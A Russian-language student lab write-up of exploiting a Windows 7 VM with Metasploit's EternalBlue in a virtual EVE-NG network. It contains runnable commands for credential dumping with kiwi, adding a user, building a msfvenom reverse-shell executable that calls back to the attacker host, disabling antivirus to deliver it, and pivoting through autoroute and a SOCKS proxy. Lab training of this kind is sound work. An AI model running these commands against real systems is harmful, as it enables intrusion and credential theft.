# Практика №3. Эксплутация уязвимостей. MetaSplot Framework
# Задание к практической работе №3
- Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать)
- Настроить каждое устройство в соответсвии со следующими параметрами:
- Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP
- На PfSense выполнить проброс с внешних 445/tcp и 3389/tcp портов на аналогичные порты win-7 виртуальной машины
- Выполнить сканирование внешнего интерфейса межсетевого экрана с помощью nmap и Nessus с целью обнаружения уязвимых сервисов
- Использую Metasploit Framework - получить доступ до Windows-7 виртуальной машины
- Используя payload meterpreter:
- выполнить создание нового пользователя
- Выполнить скриншот рабочего стола
- получить все учетные записи, находящиеся в памяти системы
- Выполнить проксирование трафика во внутреннюю инфраструктуру
## Инфраструктура организации:
- Kali-2021 - Linux Kali 2021 (2CPU, 2GB RAM)
- FW-pfsense - PfSense Firewall 2.5.2, default config (Qemu version 4.1.0, 2CPU, 2GB RAM)
- Switch - Cisco IOL-L2 (2 port-groups)
- Debian - Linux Debian 10 (1CPU, 1GB RAM)
- Win-10 - Windows 10 (full) (2CPU, 2GB RAM)
- Win-7 - Windows 7 (full) (QEMU 2.12, 4CPU, 4GB RAM)
- Network:
- Pfsense Default config (WAN-DHCP, LAN - static IP)
**Шаблон практической работы №3**
- Internet - Cloud-1
## Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать)
**Импортируем структуру**

**Уменьшим память для машинок т.к. оперативной памяти только 8гб.**
Основная цель операционной системы pfSense - обеспечить безопасность для домашней и деловой среды, это оборудование действует как межсетевой экран, но мы также можем использовать его в качестве основного маршрутизатора, поскольку у нас есть сотни дополнительных параметров конфигурации.
## Обновляем машинки





## Настроить каждое устройство в соответсвии со следующими параметрами:
**Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP**
DHCP (Dynamic Host Configuration Protocol) – протокол прикладного уровня модели TCP/IP, служит для назначения IP-адреса клиенту. IP-адрес можно назначать вручную каждому клиенту, то есть компьютеру в локальной сети. Но в больших сетях это очень трудозатратно, к тому же, чем больше локальная сеть, тем выше возрастает вероятность ошибки при настройке. Поэтому для автоматизации назначения IP был создан протокол DHCP.
Windows7 и Windows10 получают свои адреса автоматически.


Для устройства Debian, необходимо прописать команду `dhclient`.
dhclient используется для управления адресом интерфейса по протоколу DHCP.

Включим shh на Kali
```
sudo systemctl enable ssh
sudo service ssh start
```
Пробросим порты

Теперь у нас есть два уязвимых порта 445 и 3389
порт 445 используется Windows для совместной работы с файлами
порт 3389 - Протокол RDP используется для удаленного доступа к рабочему столу компьютера или сервера с Windows
sudo nmap 192.168.115.148 -p 445,3389 -A
-p - указывает сканируемые порты
-A - запускает агрессивное сканирование

## Используя Metasploit Framework - получить доступ до Windows-7 виртуальной машины
Эксплойты - это код, который эксплуатирует ошибку, неверную настройку или системный сбой. Эксплойт помогает найти ее, а потом воспользоваться, чтобы войти в систему.
Для вызова Metasploit Framework:
```
msfconsole
```

После этого она выдаёт информацию о том, сколько всего присутсвует в ней инструментов по категориям. Пропишем поиск:
`search ms17-010`

Воспользуемся eternal blue
Просмотрим инфомрацию по данному эксплоиту при помощи:
`info 0`

Информация по эксплоиту сообщает нам о том, что он используется на Windows версии х64.

RHOSTS - указываем этой командой Metasploit определенный хост в сети для его изучения. Хост можно задать как по его имени, так и по IP-адресу.
RPORT - задаем для Metasploit порт удаленной машины, по которому фреймворк должен подключиться к указанному хосту.
По умолчанию для этого эксплоита RPORT задаётся 445. Поэтому далее нам необхдимо указать RHOST. Используем внешний IP, который сканировали раннее и запускаем.
```
set RHOSTS 192.168.115.148
run
```

Подключение успешно
## Используя meterpreter:
**Выполнить скриншот рабочего стола**
Используем команду
```
screenshot
```

**Получить все учетные записи, находящиеся в памяти системы**
```
load kiwi
```
Расширение Kiwi используется для выполнения различных операци1, например сброс паролей и хэшей, сохранение паролей в памяти и других.

Введем команду
`сreds_all`
Получаем данные учетных записей

## Выполнить создание нового пользователя
Используем команду
`run getgui -u divad -p evaeva`
-u - логин
-p - пароль

Пользователь успешно создан
## Выполнить проксирование трафика во внутреннюю инфраструктуру
Используем команду
```
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.115.129 lport=4444 -f exe -o hackerfile.exe
```
-p - сокращение от “payload”, полезная нагрузка
Полезная нагрузка – это вредоносный скрипт, который используетcя для взаимодействия с машиной с целью её компрометации
LHOST - IP-адрес атакующего
LPORT - порт вашего компьютера
-f - параметр, который задает тип файла, например, exe
-o - указывает наименование файла

Запускаем сервер
`python -m http.server 80`
-m - сокращение от “module”, указывает на название модуля
И переходим на Windows10 по IP Kali

Скачиваем файл
Не пропускает

Отключаем антивирус
После отключения файл успешно скачан

Перейдем в kali и введем команду в meterpreter
`use exploit/multi/handler`
Exploit/multi/handler - это общий обработчик полезной нагрузки для приёма соединений, исходящих от автономных полезных нагрузок или эксплойтов

Используем тот же payload
`set payload windows/meterpreter/reverse_tcp`

Меняем LHOST и LPORT на те, которые мы указали в msfvenom
```
set LHOST 0.0.0.0
set LPORT 4444
```

Запускаем его при помощи run
Теперь прослушивается 4444 порт
Ждём, пока жертва запустит файл. После запуска происходит reverse_tcp и у нас доступ к устройству.
Смторим сеть:
`ipconfig `
Нашли сеть

autoroute - автоматически добавляет маршруты для цели в таблицу маршрутизации
`run autoroute -s 192.168.1.0/24`

Затем используем arp-сканнер
ARP Scan - показывает все IPv4 адреса устройств в сети
`run arp_scanner -r 192.168.1.0/24`

Воспользуемся socks_proxy для создания прокси-сервера
```
use auxiliary/srver/socks_proxy
```

Proxychains – маскирует IP
nano /etc/proxychains.conf
Пропишем
[ProxyList]
socks5 0.0.0.0 1080
Это добавит нас как прокси-сервер в proxychains
proxychains nmap -sT -sV -Pn -n -p 3389,455 192.168.1.106
-sT - отправляет TCP-пакет на порты
-sV - исследует открытые порты
-Pn - расценивает все хосты как работающие
-n - не производить DNS разрешение
-p - порты
Мы можем проксировать трафик через любое устройство из локальной сети
